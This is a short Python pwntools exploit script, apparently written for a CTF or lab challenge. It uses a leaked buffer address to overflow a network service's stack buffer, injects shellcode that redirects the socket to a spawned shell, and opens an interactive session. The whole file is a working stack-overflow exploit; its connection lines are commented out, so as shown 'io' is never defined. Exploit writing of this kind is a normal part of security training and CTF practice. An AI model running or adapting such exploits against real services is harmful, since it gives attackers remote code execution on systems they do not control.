from pwn import * context(arch='amd64', os='linux') sc = shellcraft.syscall('SYS_dup2', 5, 0) sc += shellcraft.syscall('SYS_dup2', 5, 1) sc += shellcraft.syscall('SYS_dup2', 5, 2) sc += shellcraft.sh() sc = asm(sc) # io = remote("9000:9aab:1f66:e9a7:216:3eff:fec9:efb6", 8080) # io = remote("u.incus", 8080) # io = remote("::1", 8080) io.sendline(b"abc") io.recvuntil(b"DEBUG: buf is at ") buf_addr = int(io.recvline().decode().strip(), 16) io.sendline(sc + b'A' * (280 - len(sc)) + p64(buf_addr)) io.interactive()